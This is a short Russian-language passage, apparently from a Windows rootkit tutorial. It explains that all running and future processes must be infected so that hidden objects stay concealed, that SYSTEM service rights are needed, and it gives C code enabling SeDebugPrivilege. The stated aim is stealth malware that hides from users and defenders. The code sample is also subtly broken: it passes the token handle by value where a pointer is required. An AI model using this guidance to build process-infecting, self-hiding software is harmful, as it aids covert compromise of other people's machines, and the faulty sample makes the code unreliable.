Как стать невидимым в Windows?

 Перехват и распространение

Чтобы получить желаемый эффект, мы должны заразить все запущенные

процессы, а также процессы, которые будут запущены позже. Новые процессы должны

быть заражены до выполнения первой инструкции их кода, иначе они смогут увидеть

наши скрытые объекты до того, как функции будут перехвачены.

 Привелегии

Нам нужны как минимум администраторские права, чтобы получить доступ ко

всем запущенным процессам. Лучшая возможность - это запуск нашего процесса как

системного сервиса, который работает с правами пользователя SYSTEM. Чтобы

установить сервис нам тоже нужны специальные привелегии.

Также очень полезно получение привелегии SeDebugPrivilege. Это может

быть сделано с помощью функций OpenProcessToken, LookupPrivilegeValue и

AdjustTokenPrivileges.

BOOL OpenProcessToken(

HANDLE ProcessHandle,

DWORD DesiredAccess,

PHANDLE TokenHandle

);

BOOL LookupPrivilegeValue(

LPCTSTR lpSystemName,

LPCTSTR lpName,

PLUID lpLuid

);

BOOL AdjustTokenPrivileges(

HANDLE TokenHandle,

BOOL DisableAllPrivileges,

PTOKEN_PRIVILEGES NewState,

DWORD BufferLength,

PTOKEN_PRIVILEGES PreviousState,

PDWORD ReturnLength

);

Игнорируя возможные ошибки, это может быть сделано так:

#define SE_PRIVILEGE_ENABLED 0x0002

#define TOKEN_QUERY 0x0008

#define TOKEN_ADJUST_PRIVILEGES 0x0020

HANDLE hToken;

LUID DebugNameValue;

TOKEN_PRIVILEGES Privileges;

DWORD dwRet;

OpenProcessToken(GetCurrentProcess(),

TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,hToken);

LookupPrivilegeValue(NULL,"SeDebugPrivilege",&DebugNameValue);

Privileges.PrivilegeCount=1;

Privileges.Privileges[0].Luid=DebugNameValue;

Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken,FALSE,&Privileges,sizeof(Privileges),

NULL,&dwRet);

CloseHandle(hToken);

Добавить комментарий